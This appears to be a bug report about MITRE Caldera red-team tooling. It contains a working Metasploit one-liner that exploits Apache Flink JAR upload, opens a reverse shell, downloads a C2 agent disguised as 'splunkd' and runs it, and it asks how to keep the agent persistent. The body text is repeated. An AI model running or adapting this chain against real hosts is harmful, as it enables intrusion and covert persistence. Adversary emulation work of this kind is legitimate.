Hello,
I am trying to use Caldera alongside Metasploit to achieve lateral movement on a Linux target host, I've managed to get a Metasploit one line command to achieve a reverse shell and run a sandcat agent on the target host. This is the command I've been using that works through the terminal:
msfconsole -q -x "use exploit/multi/http/apache_flink_jar_upload_exec; \
set rhosts x.x.x.x; \
set payload java/shell_reverse_tcp; \
exploit -j; \
sessions -i 1 -c 'curl -s -X POST -H \"file:sandcat.go\" -H \"platform:linux\" \"http://x.x.x.x:8888\"/file/download > splunkd'; \
sessions -i 1 -c 'chmod +x splunkd'; \
sessions -i 1 -c './splunkd -server \"http://x.x.x.x:8888\" -group red -v; &";
Bug Description
Whenever I attempt to run this through the Caldera web server using a sandcat agent I either get an "stty: 'standard input': Inappropriate ioctl for device" error or the command actually goes through and starts the sandcat agent on the target host but is short lived as a result of the process being killed due to a timeout. I've attempted to mitigate the second issue by running the agent in the background using an & but the process still gets killed anyway. Is there anyway I can have the sandcat agent persist on the target host without worrying about the command timing out? (Screenshots of the errors are below in the Screenshot section)
To Reproduce
Steps to reproduce the behavior:
- Run an instance of Caldera on an attacking Linux host with Metasploit installed, and using a sandcat agent I load the Metasploit abilities onto Caldera using the access plugin
- I generate an adversary consisting of the reverse shell exploit I'm using, I update the command to the one above and hardcode the target hosts IP into the command for testing purposes
- I run the operation using the adversary I just generated through the sandcat agent, the reverse shell is achieved and the sandcat agent is briefly started just to be killed due to timeout or the "stty: 'standard input': Inappropriate ioctl for device" error.
Expected behavior
I am wanting the command to be considered successful by the operation status, and the sandcat agent to persist on the target host without the process being killed.
Screenshots
Desktop:
- OS: Ubuntu 18.04
- Browser: Chromium
Hello,
I am trying to use Caldera alongside Metasploit to achieve lateral movement on a Linux target host, I've managed to get a Metasploit one line command to achieve a reverse shell and run a sandcat agent on the target host. This is the command I've been using that works through the terminal:
Bug Description
Whenever I attempt to run this through the Caldera web server using a sandcat agent I either get an "stty: 'standard input': Inappropriate ioctl for device" error or the command actually goes through and starts the sandcat agent on the target host but is short lived as a result of the process being killed due to a timeout. I've attempted to mitigate the second issue by running the agent in the background using an & but the process still gets killed anyway. Is there anyway I can have the sandcat agent persist on the target host without worrying about the command timing out? (Screenshots of the errors are below in the Screenshot section)
To Reproduce
Steps to reproduce the behavior:
Expected behavior
I am wanting the command to be considered successful by the operation status, and the sandcat agent to persist on the target host without the process being killed.
Screenshots
Desktop: